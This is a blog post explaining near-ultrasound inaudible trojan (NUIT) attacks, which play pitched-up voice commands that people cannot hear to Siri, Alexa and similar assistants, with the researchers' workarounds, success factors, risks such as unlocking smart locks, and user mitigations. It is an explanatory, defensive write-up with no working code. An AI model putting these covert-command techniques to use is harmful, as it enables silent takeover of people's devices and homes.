In 2023, researchers at the University of Texas at San Antonio and the University of Colorado Colorado Springs discovered a novel and dangerous type of attack that targeted voice assistants like Siri and Alexa. The attack, dubbed a ’near-ultrasound inaudible trojan’ or NUIT for short, is fairly simple in its idea, though the actual execution is very tricky and can be inconsistent, which is probably why these attacks have not seen significant usage (as far as I can tell). Nevertheless, they are a great example of how attackers can get creative and exploit unusual vulnerabilities in order to achieve their aims.
What Is a NUIT?
A near-ultrasound inaudible trojan (NUIT) is essentially a snippet of sound which is played at a higher-than-average frequency which can be heard and understood by audio assistants (think Google Home, Siri, Alexa, Cortana, etc) but not by humans. The sound that is used is typically a common instruction which can be issued to an audio assistant. For example, “Siri, call 123456789” or “Alexa, play Trickster by Five New Old”. Because it is effectively a ’normal command’ being ‘sneakily played’ to the audio assistant, it is a bit like a trojan, which is a piece of malware that masquerades as normal software in order to infiltrate a system. What’s interesting about a NUIT is that there are two variants: The target device both plays and receives the NUIT or one device plays the NUIT, which is then received by a second device. They are fairly similar in concept but present slightly different challenges in implementation, which is discussed below.
So what about the ’near-ultrasound’ and ‘inaudible’ parts of NUIT?
Firstly, what does ’near-ultrasound’ mean? Well, first we must understand what ‘ultrasound’ refers to. In physics, it refers to frequencies above 20kHz (and it extends some way into the GHz). The frequency range that the researchers used was around 16kHz-20kHz, which makes it almost-but-not-quite in the range of ‘ultrasound’, hence the attack is a ’near-ultrasound’ attack.
Now for the inaudible part. Typically, the ’normal range’ of hearing for a human is 20Hz-20kHz but this tends to worsen with age (and prolonged exposure to loud sounds without adequate protection). According to Connect Hearing1, most people in their twenties will only be able to hear frequencies up to 17kHz and by the time they’re in their fifties, it will have dropped to just 12kHz. Ordinarily, this isn’t a huge issue, as most sounds we hear every day are in the sub-10kHz range. However, for the purposes of a NUIT, this degradation effectively puts a NUIT attack outside the range of what most people can hear, or at the very least, what most people can hear clearly. This is why it is an ‘inaudible’ trojan.
How are NUITs Made?
In principle, a NUIT seems like a fairly straightforward piece of malware. You take a command voice command, re-pitch it to be in the near-ultrasound range and then replay it to the target device.
Now, there’s a few things that are glossed over here. Firstly, in the original paper (cited below), the researchers identified three major challenges. They were:
- Making the NUIT work on standard, off-the-shelf speakers (which they call COTS speakers- commercial, off-the shelf speakers) and most devices’ microphones. Turns out that some devices simply can’t play that frequency or the microphone won’t pick it up and this was solved using “some complex sound-physics shenanigans”.
- For attacks where the NUIT is played and received on one device, the device tends to lower the speaker volume when receiving voice commands, which makes the NUIT too quiet to be heard. To solve this, the researchers identified a window of time, called a “reaction time window” in which a command could be issued before the speaker volume was reduced.
- The NUIT has to be inaudible. Not only does this mean that humans have to be unable to hear the command itself, but the subsequent response also has to be inaudible, or at least so subtle that it’s likely to go unnoticed. It was noted that this was a problem connected to the system being used, rather than the physics behind it, and each attack was adapted to suit each system as appropriate. A common solution was to simply tell the device to reduce its speaker volume.
Furthermore, it was noted that sometimes, the attack would simply fail against certain types of devices and it would have different success rates with different languages. Combined with external factors such as background noise, overall, it is a fairly hit-and-miss tactic, even though it is simple in theory. In my own testing, based on the research, there seem to be a multitude of factors that can affect a NUIT’s success, including but not limited to:
- Device’s physical model, OS and voice assistant being used
- Distance between the speaker and microphone
- Orientation of the speaker and microphone
- Audio compression and format (this includes the platform it is being played on. For example, YouTube cuts off all sounds above 16kHz)
In short, it takes a substantial amount of trial and error and micro-adjustments to get a NUIT to work successfully, even though the idea behind it is quite straightforward.
As an aside, in future, I may make a future guide or project write-up on how to actually make a functional NUIT. Maybe.
What are the Potential Risks Posed by NUITs? Can Attacks with NUITs be Mitigated?
The simple answer to the first question is just ‘whatever you can get [voice assistant here] to do’. For example, Apple now has smart locks, which can be controlled by Siri. So, in theory, an attacker could break into someone’s house by issuing a NUIT which unlocks the front door, allowing them to enter. Other smart devices that could potentially be targeted include cars, lights or accessories (e.g. watches). The scope of risks presented by NUITs is effectively limited by the connectivity of the target’s home: The more things that can be voice controlled, the more risks there are.
In terms of mitigation, the original paper highlighted a few potential mitigation tactics, though most of them are based on the devices’ specifications. They also emphasise the need for ’notifications’, i.e. some way of notifying the user that a voice command has been issued, as a method of mitigation. However, there are also some other steps that users can take to defend against NUITs, such as:
- Disabling voice assistants entirely, or at least requiring some kind of physical interaction (e.g. touch) to activate
- Disabling devices’ microphone unless you are actively using it
- Keeping devices’ speakers at zero volume, unless they are being used (only effective against single-device NUIT attacks)
Conclusion
In short, a NUIT is a malicious piece of sound that can be used to manipulate a voice assistant, either using the device it is working on or a second device. Although it does not appear to be a widespread attack, it does have significant security implications. However, it is fairly simple to prevent NUIT attacks: Keep your voice assistants off unless you are using them.
Perhaps in the future, with the rising popularity of ‘smart devices’ and the growth of the IoT, we may see NUITs become a more common threat. In the meanwhile however, it appears that they will simply remain as an interesting example of how attackers can manipulate common technologies in novel and unusual ways.
If you are interested in getting a more in-depth understanding of NUITs, the researchers’ original paper can be found here and their website with some examples is here.
Banner image credit: Markus Spiske